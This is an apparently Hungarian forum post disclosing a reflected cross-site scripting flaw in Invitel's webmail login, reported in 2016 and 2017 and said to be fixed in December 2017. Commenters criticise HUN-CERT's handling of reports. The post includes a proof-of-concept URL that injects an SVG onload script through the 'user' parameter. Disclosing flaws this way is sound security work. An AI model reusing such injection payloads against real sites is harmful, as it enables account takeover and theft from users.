Invitel Webmail XSS

Invitel Webmail XSS 2016.05.22.én jelentve, aztán 2017 decemberében. 2017.12.29 sikeres javítás.

hXXps://webmail.invitel.hu/login/?user=%22%3E%3Csvg/onload=prompt%28/fail/%29%3E

Hozzászólások

Bator voltal, hogy jelentetted. Mar a hazai viszonyokat tekintve. :)

--
Any A.I. smart enough to pass a Turing test is smart enough to know to fail it. -Ian McDonald

Nekem ezzel a HUN-CERT-vel eddig semmi pozitiv tapasztalatom nincs.

Rossz helyre küldik a reportot (nem tudják megnézni az ip whoisát), sokszor csak forwaldolnak, de azt gondolom kézzel mert siman van ami 2 hetes átfutással megy, válaszolni nem válaszolnak (akkor mégse kézzel megy?).